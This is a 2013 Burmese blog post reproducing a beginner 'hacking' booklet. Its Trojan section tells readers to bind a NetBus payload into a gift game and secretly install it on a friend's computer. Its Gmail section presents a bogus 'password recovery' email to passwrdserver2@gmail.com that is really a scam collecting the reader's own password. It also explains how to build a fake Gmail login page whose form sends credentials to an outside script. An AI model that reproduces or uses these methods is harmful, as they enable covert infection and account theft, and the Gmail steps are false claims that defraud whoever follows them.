စိုင္းသီဟစိုး ဆိုက္မွအားလံုးကို လိႈက္လွဲေႏြးေထြးစြာနဲ႕ႀကိဳဆိုပါတယ္။ ကၽြန္ေတာ္ဆိုက္ကို လာေရာက္သူအားလံုး ကိုယ္စိတ္ႏွစ္ပါး က်န္းမာခ်မ္းသာပါေစလို႕ ဆုမြန္ေကာင္းေတာင္းေပးလိုက္ပါတယ္.....
စိုင္းသီဟစိုး ဆိုက္မွအားလံုးကို လိႈက္လွဲေႏြးေထြးစြာနဲ႕ႀကိဳဆိုပါတယ္။ ကၽြန္ေတာ္ဆိုက္ကို လာေရာက္သူအားလံုး ကိုယ္စိတ္ႏွစ္ပါး က်န္းမာခ်မ္းသာပါေစလို႕ ဆုမြန္ေကာင္းေတာင္းေပးလိုက္ပါတယ္.....
စိုင္းသီဟစိုး ဆိုက္မွအားလံုးကို လိႈက္လွဲေႏြးေထြးစြာနဲ႕ႀကိဳဆိုပါတယ္။ ကၽြန္ေတာ္ဆိုက္ကို လာေရာက္သူအားလံုး ကိုယ္စိတ္ႏွစ္ပါး က်န္းမာခ်မ္းသာပါေစလို႕ ဆုမြန္ေကာင္းေတာင္းေပးလိုက္ပါတယ္.....
စိုင္းသီဟစိုး ဆိုက္မွအားလံုးကို လိႈက္လွဲေႏြးေထြးစြာနဲ႕ႀကိဳဆိုပါတယ္။ ကၽြန္ေတာ္ဆိုက္ကို လာေရာက္သူအားလံုး ကိုယ္စိတ္ႏွစ္ပါး က်န္းမာခ်မ္းသာပါေစလို႕ ဆုမြန္ေကာင္းေတာင္းေပးလိုက္ပါတယ္.....
စိုင္းသီဟစိုး ဆိုက္မွအားလံုးကို လိႈက္လွဲေႏြးေထြးစြာနဲ႕ႀကိဳဆိုပါတယ္။ ကၽြန္ေတာ္ဆိုက္ကို လာေရာက္သူအားလံုး ကိုယ္စိတ္ႏွစ္ပါး က်န္းမာခ်မ္းသာပါေစလို႕ ဆုမြန္ေကာင္းေတာင္းေပးလိုက္ပါတယ္.....

Monday, May 6, 2013

အေျခခံ Hacking နည္းပညာစာအုပ္ ။

အေျခခံ Hacking နည္းပညာစာအပ္ မာတိကာ
Introduction: ဟက္ကာဆိုတာဘာလဲ ႏွင့္ ကြ်ႏ္ုပ္၏ အျမင္
အပိုင္း (၁) : လိုအပ္ေသာအရည္အျခင္းမ်ား
အပိုင္း (၂) : Hacker တို႔၏ လွ်ိဳ႕၀ွက္ခ်က္မ်ား
……….Intro
……….Trojan Horse ဟုေခၚေသာ virus အေၾကာင္း
…………ဟက္ကာေတအြ သုံးျပဳေသာ လွ်ိဳ႕၀ွက္ အရာမ်ား
………..Port Scanning
………..SubSeven
……….NetBus
အပိုင္း (၃) : Gmail Password Hack နည္း
…………..Phishing အေၾကာင္း Intro
အပိုင္း (၄) : Phishing နည္းလမ္းကိုအသံုးျပဳ၍ gmail password ေဖာက္နည္း
အပိုင္း (၅) : Windows ကို၀င္ေမႊနည္း တိုလီမုတ္စမ်ား
………. Registry သို့၀င္ေရာက္ေမႊေႏွာက္ျခင္း
……… Folder ကို software မသံုးပဲ lock ခ်နည္း ႏွင့္ Funny Command ေရးနည္း
……… Cmd Dos Command နည္းနည္းပါးပါး
……… Folder Background ကို software မသံုးပဲ ပံုလွလွေလးထည့္နည္း
……… website ေတြ႕ရဲ႕ IP ကုိခ်က္ခ်င္းသိခ်င္တယ္ဆိုရင္
စာေရးသူ (မစၥတာ.ေမာင္ဘစ္ေန)
(18-9-2009 ~ 30-9-2009)
ဟက္ကာဆိုတာဘာလဲ ??? ကြ်ႏ္ုပ္၏အျမင္ ။
Hacking ပညာရပ္ဆိုသည္ သင္ယူလို႔ရေသာ ပညာမဟုတ္။ အသံုးခ် နည္းပညာမ်ားကို ေလ့လာေတြ႔ရွိျပီး
အားနည္းခ်က္ကို ရွာေဖြႏိုင္ေသာ ပညာျဖစ္သည္။ Online ေပၚတြင္ Hacking နဲ႔ပတ္သတ္ေသာ
စာအုပ္မ်ားစြာကိုေတြ႕ဘူးျပီး Hacking ႏွင့္ပတ္သတ္ေသာ web site မ်ားလဲ ေပၚထြက္ေနပါျပီ။ Vulnerability
ေပါင္းမ်ားစြာကို hacker ဟုေခၚေသာ လူစုမ်ားက ရွာေဖြေတြ႔ရွိျပီး web site ေပါင္းမ်ားစြာတြင္ တင္ထားၾကပါတယ္။ အဲဒီ
နည္းပညာရပ္ေတြကို အသံုးျပဳ မွီခို ေနတဲ့လူေတြအမ်ားႀကီးရွိပါတယ္။ ဒါေတြက ဟက္ကာေတြလားဆိုတဲ့
ေမးခြန္းေမးႏိုင္ပါတယ္။
Tool user ေတြပါ၊ professional hacker တစ္ေယာက္ဆိုတာ ပါရမီအရင္းခံျပီး ကြန္ပ်ဴတာ နည္းပညာ
ကိုရူးသြပ္တဲ့ လူတစ္ေယာက္ရဲ႕IT ပိုင္းဆိုင္ရာေပ်ာ့ကြက္ကို ရွာေတြ႔ႏိုင္ျခင္းျဖစ္ပါတယ္။ White, black, gray လို႔ေခၚတဲ့
hacker သံုးမ်ိဳးခြဲထားပါတယ္။ နဲ႔ black ကေတာ့ ရန္သူေတြေပါ့။ အမ်ားစုက gray ေတြပါ။
ဒါဆို က်ေနာ္ေရးထားတဲ့ စာအုပ္ကေကာ၊ ဖတ္ျပီး hacker တစ္ေယာက္ျဖစ္ႏိုင္ပါ့မလား
လို႔ေမးႏိုင္စရာအေၾကာင္းရွိပါတယ္။ က်ေနာ္ကိုယ္တိုင္ေတာင္မွ ဟက္ကာမဟုတ္တာဗ်။ :D ။ က်ေနာ္သိတာေလးေတကြ ို
share လုပ္ေပးခ်င္တဲ့ရည္ရြယ္ခ်က္ကို အဓိကထားတာပါ။
……………………………………………………………………………………………………………………………………………...........
အပိုင္း (၁) လိုအပ္ေသာ အရည္အျခင္းမ်ား
hacking လုပ္သည့္ေနရာတြင္ တစ္ဦးတစ္ေယာက္လုပ္ျခင္းထက္ အ မ်ားႏွင့္
ပူေပါင္းျပီး လုပ္လွ်င္ ပုိျပီး အ က်ဳိးရွိသည္။ ထုိ႕ေၾကာင့္ Ethical hacking တြင္ Hacker
မ်ားစုဖြဲ႕ျပီး TEAM တစ္ခုအ ေနျဖင့္ လုပ္ေဆာင္ရသည္။ ၎တုိ႕သည္ အ ခ်ိန္တုိင္း မိမိ
ကုိင္တြယ္ရေသာ System အား လုိအ ပ္ခ်က္မ်ားကုိရွာေဖြျပင္ဆင္ရသည္။
တုိက္ခုိက္ျခင္းမ်ဳိးစုံ ရွိသည့္အ တြက္ အ ားလုံးကုိသိရွိရန္မွာမျဖစ္ႏူိင္ေပ။မိမိhacking
အ ဖြဲ႕တြင္ လုပ္ကုိင္ေသာသူမ်ားသည္ ေအာက္ေဖာ္ျပပါ ပညာရပ္မ်ားကုိ တစ္ဦး
တစ္ေယာက္ျခင္း အ ေသအ ခ်ာတတ္ေျမာက္ရန္လုိအပ္သည္။
· Programming
· Webdeveloping
· Software Crackers
· Web Hackers
· Network security groups
· system admin groups
· database Hackers
· crytoanalizer
၎ပညာရပ္မ်ား အားလုံးကုိ သိရွိရန္ မလုိေပ။ သုိ႕ေသာ္ general knowledge
သိရွိရမည္။ မိမိ Hacker အဖြဲ႕တြင္ လူတစ္ေယာက္စီ ပညာတစ္ခုစီကုိ
ေသေသခ်ာခ်ာတတ္ေျမာက္ရန္လိုအပ္သည္။
Hacker တစ္ေယာက္ေအာင္ျမင္စြာျပဳလုပ္ႏုိင္ရန္အတြက္လုိအပ္ခ်က္မ်ားစြာရွိသည္။
မိမိ ၀င္ေရာက္လုိေသာ ေနရာ၏ data အျပည့္အစုံကုိသိရွိေအာင္ အရင္ဆုံးျပဳလုပ္ရမည္။
IP address
မိမိ၀င္ေရာက္ရမည့္ Computer ၏ address
Hostname
မိမိ ၀င္ေရာက္ရမည့္ Computer ၏ နာမည္
Software
၎ Computer တြင္အသုံးျပဳေသာ Software မ်ား
Firewall rules
Network ၏ လုံျခဳံေရးအတြက္အသုံးျပဳထားသည္မ်ား
Phone Numbers
ဖုန္းနံပါတ္
Employee names
အလုပ္သမားမ်ား ၏ အေၾကာင္းအရာမ်ား
မိမိတုိ႕သိလုိေသာ အခ်က္မ်ားစြာကုိ Internet မွ မ်ားစြာအကူအညီေပးႏုိင္သည္။
သင ္hacking လုပ္လုိေသာ ေနရာ၏ data ၆၀% ကုိ internet မွရွာႏုိင္ပါသည္။
၎၏ company ႏွင့္ပတ္သက္ေသာ ဖုန္းနံပါတ္ ၊ IP address ၊ Firewall ၊ အလုပ္သမား
ဦးေရ ၊ company စတင္တည္ေထာင္ေသာေန႕ ၊ company ၏ ပုိင္ရွင္ အမည္မ်ား ၊
company ခ်ိတ္ဆက္ထားေသာ တျခားNetwork မ်ား၊ company ၏ထုတ္ ကုန္မ်ားစသည့္
သတင္းအခ်က္အလက္မ်ားကုိအက်ဳိးရွိရွိ အသုံးခ်ရမည္ျဖစ္သည္။
hacking ျပဳလုပ္ရန္အတြက္အသုံးျပဳေသာ Tools မ်ား
1. Google (အေၾကာင္းအရာမ်ားစြာကုိ ရွာႏုိင္သည္။)
2. Google Earth (Network ခ်ိတ္ဆက္ျခင္းမ်ားကုိ ၾကည့္ရႈရန္)
3. Nmap (IP addres မ်ားကုိၾကည့္ရႈရန္)
4. John The Ripper (Password မ်ားကုိေက်ာ္ႏုိင္ရန္)
5. Lan Guard (မိမိ၏ Network ကုိ ေစာင့္ၾကည့္ရန္)
6. Pwdump 6 (Password မ်ားကုိခ်ိန္းရန္)
7. Firebug (website မ်ားမွျပင္ၿပီး server ထဲသို႕၀င္ရန္)
8. Java ( Mysql ကုိျပင္ဆင္ရန္)
9. putty (တျခား Computer ထဲသုိ႕ ၀င္ေရာက္ရန္)
၎ တုိ႕ျဖင့္စတင္စမ္းသပ္ အသုံးျပဳၾကျပီး မိမိတုိ႕၏ ဥာဏ္ရည္ဥာဏ္ေသြးအရ
ဆက္လက္အေကာင္အထည္ေဖာ္ၾကည့္သင့္သည္။Tools မ်ား၏ အလုပ္လုပ္ပုံကုိ ေသခ်ာ နား
လည္မွသာ အသုံးျပဳႏုိင္မည္ျဖစ္သည္။Tools မ်ား၏ အားနည္းခ်က္မ်ားကုိ သိထားရမည္ ျဖစ္
သည္။ Tools မ်ားကုိသုံးလွ်င္ ၎တုိ႕၏ သုံးစြဲပုံ အေၾကာင္းကုိ ေသခ်ာဖတ္ၾကည့္ရမည္။
……………………………………………………………………………………………………………………………………………...........
အပိုင္း (၂) Hacker တို႔၏ လွ်ိဳ႕၀ွက္ခ်က္မ်ား…
Intro
Trojan Horse
Hacking ရဲ႕အဓိက တရားခံလို႔ေျပာႏိုင္တာကေတာ့ Trojan ဆိုတဲ့ virus ေၾကာင့္ပါ။
အင္တာနက္ဆိုင္ေတြမွာ ေတြ႔ရတတ္တယ္ ။ USB Stick ေတြကို virus scan လုပ္လိုက္ရင္
ေတာ္ေတာ္မ်ားမ်ားေတြ႔ရတဲ့ virus တစ္မ်ိဳးေလ။ Trojan, Trojan နဲ႔ လူသိေတာ္ေတာ္မ်ားပါတယ္။
က်ေနာ္ေလ့လာလို႔သိရတာေတာ့ ကြန္ပ်ဴတာရဲ႕ အခ်က္အလက္ေတြ၊ password ေတြအခိုးခံရတာဟာ အဲဒီ
Trojan ေတြေၾကာင့္လို႔ သံသယျဖစ္မယ္ဆိုရင္ မမွားႏိုင္ပါဘူး။ Trojan ဆိုတာ program ေသးေသးေလးပါ။
အဲဒီ program ေလးက ကြန္ပ်ဴတာတစ္ခု ထဲမွာ ၀င္ေရာက္ေနရာယူကာ hacker ဆီသို႕ ၄င္းကြန္ပ်ဴတာ၏
information မ်ားကို သတင္းေပးႏိုင္ေသာ Program တစ္ခုပါ။ ၄င္း Trojan ျဖင့္ ကြန္ပ်ဴတာမ်ားကို
ထိန္းခ်ဳပ္ႏိုင္ပါသည္။
Trojan မ်ား၏ အမ်ားအားျဖင့္ လုပ္ေဆာင္ႏိုင္ေသာ အစြမ္းသတိၱမ်ားကို ေအာက္တြင္ေဖၚျပထားပါသည္။
.CD-Rom drive မ်ားကို အဖြင့္၊ အပိတ္ control လုပ္ႏိုင္ျခင္း
.သင္၏ ကြန္ပ်ဴတာမွ screenshot ကို capture လုပ္ႏိုင္ျခင္း
.သင္၏ password မ်ား ( Windows, MSN, Gmail, Yahoo,….အစသျဖင့္) ကို hacker ဆီသို႔ သတင္းပို႔ေပးႏိုင္ျခင္း
.သင္၏ hard disk ထဲမွ file မ်ားကို လိုသလို ကူးယူႏိုင္ျခင္း၊ delete လုပ္ႏိုင္ျခင္း
.Keyboard ႏွင့္ mouse ကို Disable လုပ္ႏိုင္ျခင္း……အစသျဖင့္
Popular ျဖစ္ေနေသာ Trojan မ်ား
-NetBus
-SubSeven
NetBus Trojan မွာ အျခား Trojan မ်ားကဲ့သို႕ အေရးႀကီးတဲ့ အစိတ္အပိုင္း ၂ ပိုင္း ရွိပါတယ္။ NetBus Server.exe ရယ္
Patch.exe ရယ္ဆို တဲ့ exe file ၂ ခု ပါ၀င္ပါတယ္။ NetBus Server ကို သင္၏ ကြန္ပ်ဴတာထဲသို႔ အရင္ဆံုး install
လုပ္ရန္လိုပါသည္။ Patch file ကို သင္ hack ခ်င္ေသာ ကြန္ပ်ဴတာထဲသို႔ သြင္းႏိုင္ရန္ အဓိက လိုအပ္ပါသည္။
ဥပမာ- သင္ hack ခ်င္ေသာ ကြန္ပ်ဴတာ ပိုင္ရွင္၏ information ကိုအရင္ဆံုးစံုစမ္းသင့္ပါသည္။ သင္သည္
မိတ္ေဆြ သူငယ္ခ်င္းဆို လွ်င္ပို၍ အဆင္ေျပပါသည္။ ေရွးဦးစြာ သူ ၏ email သို႔ ပို႔၍ run
ခိုင္းျခင္းအားျဖင့္လဲ ရႏိုင္ပါသည္။ ဒါမွမဟုတ္ သူ႔အား ဂိမ္းလက္ေဆာင္ေပးသလိုလိုျဖင့္ ၄င္းဂိမ္းထဲတြင္
Patch file ကို သြင္းေပးလိုက္ပါ။ chess.exe file ဆိုပါစို႕။ ၄င္း exe file ထဲသို႔ Patch သြင္းလိုက္ပါ။
ResHacker software ျဖင့္ ဖန္တီးႏိုင္ပါသည္။ ထို႔ေနာက္ သင္ဖန္တီးလိုက္ေသာ chess.exe ဟာ
သာမန္အတိုင္းပါပဲ။ ဘာမွမေျပာင္းလဲသြားပါဘူး။ အဲဒီ ဟာကို install လုပ္လိုက္လွ်င္ ဂိမ္းဟာ သူ႔
orginal အတိုင္းပါပဲ။ ဘာမွ ျပႆနာမေပးႏိုင္ပါဘူး။ သင္ေပးလိုက္တဲ့ chess ထဲက patch file
ေလးက သင္ hack ခ်င္ေသာ ကြန္ပ်ဴတာထဲတြင္ ေနရာယူျပီးသားျဖစ္ပါတယ္။ အဲဒီ file ကလဲ hidden
ျဖစ္ေနတာပါ။ အဲဒါဆို အဆင္ေျပသြားပါလိမ့္မယ္။ စ hack က်တာေပါ့။…..:D ။
ဟက္ကာေတြ အသံုးျပဳေသာ လွ်ိဳ႔၀ွက္ အရာမ်ား
(၁) Port Scanners
Port Scanner ဆိုတာဘာလ ဲ
Port Scanning ရဲ႕ အဓိက ရည္ရြယ္ခ်က္ကေတာ့ opening port ေတြကို ရွာဖို႕ျဖစ္ပါတယ္။ Hacker တစ္ေယာက္
အတြက္ အေျခခံက်တဲ့ နည္းတစ္ခုပါ။ opening port ေတြကိုသိမွ hack လို႔လြယ္မွာကိုး….။Hacker အေနနဲ႔ server ေပၚ
မွာလုပ္ေနတဲ့ service ေတြကို ၾကည့္ျခင္းအားျဖင့္ vulnerability ေတြကို ရွာႏိုင္ဖို႔ အခြင့္အလန္းပိုမ်ားလာမွာပါ။
နာမည္ႀကီးတဲ့ nmap port scan tool ကိုေဒါင္းလုတ္ခ်ဖို႔ link ပါ > http://nmap.org/download.html <
Online ေပၚမွာအျခားport scanner tool ေကာင္းေကာင္းေတြအမ်ားႀကီးရွိပါေသးတယ္….။
Start Scanning
Target Host: www.yourcompany.com
TCP Port :7 (echo)
TCP Port :9 (discard)
TCP Port :13 (daytime)
TCP Port :19 (chargen)
TCP Port :21 (ftp)
TCP Port :23 (telnet)
TCP Port :25 (smtp)
TCP Port :37 (time)
TCP Port :53 (domain)
TCP Port :79 (finger)
TCP Port :80 (www)
TCP Port :110 (pop)
TCP Port :111 (sunrp)
Port Scanning ကို ၂ မ်ိဳးလုပ္ႏိုင္ပါတယ္။ ပထမတစ္ခုက Single IP port ဖြင့္ရန္အတြက္ႏွင့္ ဒုတိယတစ္ခုကို Range IP
Port ဖြင့္ရန္ျဖစ္ပါတယ္။ IP ဆိုတာက ေရွ႕ကဟာကတူျပီး အေနာက္က နံပါတ္ကေျပာင္းလဲသြားႏိုင္ပါတယ္။
ဥပမာ 192.168.1.2 , 192.168.1.3 အစသျဖင့္ေပါ့။ ဖုန္းနံပါတ္အတိုင္းပါပဲ (530-xxx) အစသျဖင့္……….
Range IP ဆိုတာက ေတာ့ ( 555-0000 to 555-9999) အထိ ၾကားထဲက မည္သည့္ဂဏန္းမဆို ျဖစ္ႏိုင္ပါတယ္။
Port Scanner ဆိုတာ ဒီလုိမ်ိဳးေပါ့
(၂) Trojan
Trojan အေၾကာင္းကေတာ့ Hacking မွာ မပါ မျဖစ္ကိုေတြ႔ရမွာပါ။ ဘာလို႔လဲဆိုေတာ့ Trojan ေတြက
ဟက္ကာေတြရဲ႕လက္စ ြဲ virus တစ္မ်ိဳးမို႔လို႔ပါ။ Trojan ေပါင္း တစ္ရာေက်ာ္နီးပါရိွပါတယ္။ အဲဒီထဲက
စံုတြဲ သေဘာလိုျဖစ္ေနေသာ Trojan အေၾကာင္း ဥပမာ အေနႏွင့္ေဖၚျပထားပါတယ္။ အဲဒီ Trojan ျဖင့္
က်ေနာ္ အခုလက္ရွိေမႊေနတယ္ေလ…..
Sub Seven
Sub Seven Trojan မွာ လုပ္ေဆာင္ႏိုင္တဲ့ စြမ္းရည္ အမ်ားအျပားရွိပါတယ္။ ၄င္း Trojan ဟာ က်ေနာ္ေတြ႔ဖူးသမွ်
Trojan ၁၀၀ေက်ာ္ေလာက္ထဲက အေကာင္းဆံုး လို႔ ယူဆပါတယ္။ ၄င္းရဲ႕လုပ္ေဆာင္ႏိုင္တဲ့စြမ္းရည္ေတြကို
ေအာက္မွာေဖၚျပထားပါတယ္။
SubSeven ဆိုတာ ဒီလိုမ်ိဳးပါ
လုပ္ေဆာင္ႏိုင္မွဳမ်ား
-address book
-www pager retriever
-UNI2IP
-remote IP scanner
-host lookup
-get WINDOWS CD-Key
-update victim from URL
-ICQ takeover
-FTP root folder
-retrieve dial-up passwords along with phone numbers and username
-port redirect
-IRC boot for a list of commands
-file manager bookmarks
-make folder, delete folder (Empty of Full)
-process manager
-text 2 speech
-Restart server
-Aol Instant Messenger Spy
-Yahoo Messenger Spy
-Microsoft Messenger Spy
-Retrieve list of ICQ uins and passwords
-App Redirect
-Edit files
- set/change screen saver settings
-Restart Windows
-IP Tools (Resolved Host name/ Ping IP address)
-Address
-City
-E-Mail
-Real name
-Country code
-Local Phone
-Zip code………….အစသျဖင့္ေပါ့…….. အျခားလုပ္ေဆာင္ႏိုင္မႈမ်ားစြာရွိပါေသးတယ္….။
NetBus
Net Bus ဆိုတာကေတာ့ ဟိုးအရင္တုန္းက သံုးခဲ့တဲ့ Trojan အေဟာင္းတစ္မ်ိဳးပါ။ ဒါေပမဲ့ ေတာ္ေတာ္
မ်ားမ်ားကေတာ့ ၄င္းကို ခုခ်ိန္ထိ သံုးစြဲလွ်က္ရွိၾကပါတယ္။ Net Bus နဲ႔ေမႊြရတာလဲေတာ္ေတာ္အဆင္ေျပပါတယ္။
စမ္းသံုးၾကည့္ေပါ့……..။ သံုးနည္းကို အေပၚတြင္ ေဖၚျပၿပီးပါၿပီ။
NetBus ကို ဤသို႔ေတြ႔ျမင္ရပါတယ္။
NetBus ၏ လုပ္ေဆာင္ႏိုင္စြမ္းမ်ားကို အထက္တြင္ ေဖၚျပထားပါသည္။ အေသးစိတ္ေတာ့ မေဖၚျပေတာ့ပါ။
……………………………………………………………………………………………………………………………………………...........
အပိုင္း (၃) Gmail Password Hack နည္း
Gmail Password ကို Hack ရာတြင္ ဘာေတြလိုအပ္သနည္း ???
Hack နည္းေပါင္းမ်ားစြာရွိပါတယ္။ ေရွးဦးစြာ ရိုးရိုးရွင္းရွင္းျဖင့္ Hack ေသာနည္းလမ္းကို အရင္ေဖၚျပပါမည္။ လြန္ခဲ့တဲ့
၂၀၀၈ ခုႏွစ္ေလာက္တုန္းက javascript နည္းျဖင့္က်ေနာ္ သံုးၾကည့္ဖူးပါတယ္။ အခုေနာက္ပိုင္းထပ္သံုးၾကည့္တာ
မရေတာ့ပါဘူး၊ Google က admin ေတြကလဲ ငတံုးေတြမွမဟုတ္တာ။ သူတို႔ security ေတြကို
ခဏခဏျပန္ျပန္ျပင္တယ္ေလ။ က်ေနာ္တို႔ထက္အမ်ားႀကီးမွ အမ်ားႀကီးကိုလည္တာေပါ့။ ယခု နည္းက ေတာ့ Google ရဲ႕
security ေတြကို ျဖတ္ေက်ာ္လို႔ရတဲ့ javascript အသစ္တစ္ခုပါ။ က်ေနာ္ဤ နည္းကို ႏိုင္ငံျခား Hacking
စာအုပ္ထဲကေနု ဘာသာျပန္ထားတာပါ။ ၀ါသနာပါရင္ နည္းနည္းပါးပါးေလာက္ ၀င္ေမႊၾကည့္ၾကေပါ့
လုပ္နည္း
တစ္ဆင့္ျခင္းဆီေဖၚျပထားပါတယ္။
အဆင့္(၁) သင္၏ကိုယ္ပိုင္ Gmail account ျဖင့္ Gmail ထဲသို႔ Login ၀င္ပါ။
မွတ္ခ်က္ ( passwrdserver2@gmail.com သို႔အရင္ဆံုး add ထားပါ၊ add
ထားျပီးအနည္းဆံုးရက္ေပါင္း ၃၀ ျပည့္မွ ဤလုပ္နည္းသို႔စတင္လုပ္ႏိုင္မည္ျဖစ္သည္)
အဆင့္(၂) Login ၀င္ျပီးျပီးျခင္း compose mail လုပ္ပါ။To: ဆိုတဲ့ေနရာမွာ passwrdserver2@gmail.com
လို႔ေရးပါ။(passwrdserver2@gmail.com ဆိုတာ Google server မွ username ႏွင့္ password မ်ား ကို
မွတ္ထားေသာ ေနရာသို႔ mail ပို႔လိုက္ျခင္းျဖစ္ပါတယ္။ Automatic server ကေန သင့္ကို mail
တစ္ေဆာင္ျပန္ပို႔ပါလိမ့္မယ္။ ေစာင့္ေနပါ)
အဆင့္(၃) Subject: ဆိုတဲ့ ေနရာမွာ ‘’PASSWORD RECOVERY’’ ဆိုၿပီး တိတိက်က်ေရးပါ။
စာလံုးေပါင္းမမွားပါေစႏွင့္။ အေရးႀကီးပါတယ္။
အဆင့္(၄) mail ကိုစတင္ေရးႏိုင္ပါျပီ။ ပထမစာေၾကာင္းမွာ သင္ hack ခ်င္ေသာ သူ၏ account ကိုေရးပါ။
အဆင့္(၅) ဒုတိယစာေၾကာင္းမွာေတာ့ သင္ယခုလက္ရွိအသံုးျပဳေနေသာ gmail account ကိုေရးပါ။
အဆင့္(၆) တတိယေျမာက္စာေၾကာင္းမွာေတာ့ သင္၏ gmail password ကိုေရးပါ java script ျဖင့္ users
administrator server security ကိုျဖတ္ေက်ာ္ရာတြင္ verify လုပ္ရန္သင္၏ password ကိုလဲလိုပါတယ္။
အဆင့္(၇) ေနာက္ဆံုးအဆင့္နဲ႔ တကယ့္ကိုအေရးအႀကီးဆံုးအဆင့္ပါပဲဗ်ာ..။ ေအာက္မွာ က်ေနာ္ေဖၚျပထားတဲ့
code ကိုေသေသခ်ာခ်ာ ေကာ္ပီကူးပါ။
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
အားလံုး ready ျဖစ္ပါက send လို႔ရပါျပီ။ send လိုက္ပါေတာ့။
ဥပမာ- သင္၏ ကိုယ္ပိုင္ gmail account က myname@gmail.com ဆိုပါစို႔
သင္၏ password က 123456 လို႔မွတ္လိုက္ပါ။ သင္ hack ခ်င္ေသာ သူ၏
Gmail account ကေတာ့ test@gmail.com လို႔ထားလိုက္ပါ။က်ေနာ္ေအာက္မွ ေဖၚျပထားတဲ့အတိုင္း
mail တစ္ေဆာင္ေရးပါ။……..
To: ‘’gmail.com’’<passwrdserver2@gmail.com>
Bcc: , cc: ထိုေနရာမ်ားတြင္ ဘာမွ မေရးပါႏွင့္
Subject: ‘’PASSWORD RECOVERY’’
Text box ထဲတြင္ေရးရန္
test@gmail.com
myname@gmail.com
123456
cgi-bin_RETRIVE_PASS_BIN_PUB/$et76431&pwrsa
script< ip://233.243.2.34/cgi-bin/start?
v703&login=passmachine&f=(password)&f=27586&javascript=ACTIVE&rsa#>
{simply copy and paste above.}
System Reg လို႔ေခၚတဲ့ mail တစ္ေဆာင္ သင့္ဆီကို ၆ နာရီအတြင္း automatic ျပန္ပို႔ပါလိမ့္မယ္။ ထို mail
ထဲတြင္ သင္ hack လိုေသာသူ၏ information မ်ားအကုန္ပါလာမွာျဖစ္ပါတယ္။ စမ္းၾကည့္က်ပါ။ က်ေနာ့္ mail
ကိုေတာ့ မ hack နဲ႔ေနာ္ password ကို အလံုး ၆၀ ေပးထားလို႔ပါ…..ဟီး……ဟီး…..
Phishing
Phishing ႏွင့္ ပတ္သတ္ျပီး
က်ေနာ္ Phishing ဆိုတဲ့ အေၾကာင္းကို သိသေလာက္ နည္းနည္းေျပာခ်င္ပါတယ္။ တကယ္ေတာ့ အဲဒီ Phishing
ဆိုတာ လိမ္တဲ့ နည္းေလးတစ္ခုပါ။ သူမ်ားရဲ႕ Gmail account ပဲျဖစ္ျဖစ္၊ Yahoo account ပဲျဖစ္ျဖစ္၊ mediafire account
ပဲျဖစ္ျဖစ္ မည္သည့္ အေကာင့္ ကိုမဆို လိမ္ညာကာ password ယူလို႔ရေသာနည္းလမ္းျဖစ္ပါတယ္။ Phisher ဆုိတာ
ကြန္ပ်ဴတာ အသုံးၿပဳသူတုိ႔ရဲ႕ Data Information ေတြကုိရယူရန္ ၿပဳလုပ္ထား အတုအေရာင္စာမ်က္ႏွာ (a fake login
page) တစ္ခုသာလွ်င္ ၿဖစ္ပါတယ္။ fake login page ေတြက Computer user ေတြရဲ႕ user name and password
ေတြကုိ ဖုိင္တစ္ခုကေန၊ ဒါမွမဟုတ္ ေမးလ္ကုိ Direct ပုိ႔တဲ႔ နည္းလမ္းသုံးထားတာမ်ားပါတယ္... တစ္ခ်ဳိ႕ေတြက
က်ယ္က်ယ္ၿပန္႔ၿပန္႔သုံးၾကပါတယ္..
သ႔ရူ ဲ႕အလုပ္လုပ္ပုံက ရိုးရွင္းပါတယ္။ free host, free domain, code script ( မိမိ hack ခ်င္တဲ့ site ရဲ႕ code ပါ )
ျပီးရင္ setting အနည္းငယ္ေလး ၀င္ျပင္ျပီးရင္ Hack လို႔ရပါျပီ။
php enabled ထားတဲ႔ web hosting တစ္ခုလုိပါတယ္... Phishing Attacker ေတြကေတာ့ free ရတဲ႔ webhosting မွာ
account တစ္ခုဖြဲ႔ၿပီးသုံးေလ့ရွိပါတယ္...
မိမိအသုံးၿပဳတဲ႔ mail services, ဆုိၾကပါဆုိ Gmail
https://mail.google.com ကုိပဲသြားသြား, https://www.gmail.com ပဲ ၿဖစ္ၿဖစ္ ဖြင့္ကာ Ctrl + U သုိ႔မဟုတ္ Menu bar
မွာ view>Page Source ကိုသြားကာ အကုန္လုံးကုိ Copy ကူးၿပီး text editor or web editor .. example :
Dreamwaver ကဲ႔သုိ႔ Editor ထဲကုိ အကုန္လုံး paste လုပ္ယူလုိက္ပါ...
Code:
<form id="gaia_loginform" action="https://www.google.com/accounts/ServiceLoginAuth?service=mail" method="post"
onSubmit="return(gaia_onLoginSubmit());">
ကုိ မိမိဖန္တီးထားတဲ႔ login page မွ data ေတြကုိ ရယူႏုိင္ေအာင္ သိမ္းဆည္းထားတဲ႔ login script file
ကုိလမ္းညြန္ေပးရပါတယ္..
ဥပမာ..
Code:
<form action="http://www.planetcreator.net/tutorial/Fake Login/login.php" method="post">
(login.php ဆုိတာက fake login page က User ရုိက္ထည့္လုိက္ေသာ user name and password ကုိရယူတာပါ)
အဲ႔လုိ ၿပင္ဆင္မူ႔ေတြလုပ္ၿပီး free hosting တစ္ခုမွာတင္...
user ကုိ နည္းမ်ဳိးစုံနဲ႔ မိမိရဲ႕ ေထာင္ေၿခာက္ထဲကုိ အေရာက္သြင္းၾကတာပါ..........
ဒါက Fake Login Page ေတြရဲ႕ နမူနာပါ။ တကယ္တမ္း fake login ေတြက ဒီေလာက္နဲ႔ မလုံေလာက္ပါဘူး... Phishing
Hacker ေတြက သူတုိ႔ရဲ႕ phisher ေတြကုိ နည္းလမ္းမ်ဳိးစုံနဲ႔ ၄င္းတုိ႔ရဲ႕ Victim ယုံၾကည္ေလာက္ေအာင္
ေသြးေဆာင္ၿဖားေယာင္း၊ ၿပီးေတာ့ attacker ဖန္တီးထားတဲ႔ page ကုိေရာက္ရင္ေတာင္မွ သာမာန္ user
တစ္ေယာက္အတြက္ လုံး၀ (လုံး၀) မသိေအာင္ address bar / mouse down function
ေတြကအစေပါ႔...စသည္..စသည္
၄င္း Fake Loign အားသြားေရာက္ စမ္းသပ္ရန္... စမ္းသပ္ရုံစမ္းသပ္ပါ... မိမိရဲ႕ gmail user name and password
ကုိေယာင္လုိ႔ေတာင္ ရုိက္မထည့္လုိက္နဲ႔.... လုံး၀ တာ၀န္မယူ။
……………………………………………………………………………………………………………………………………………...........
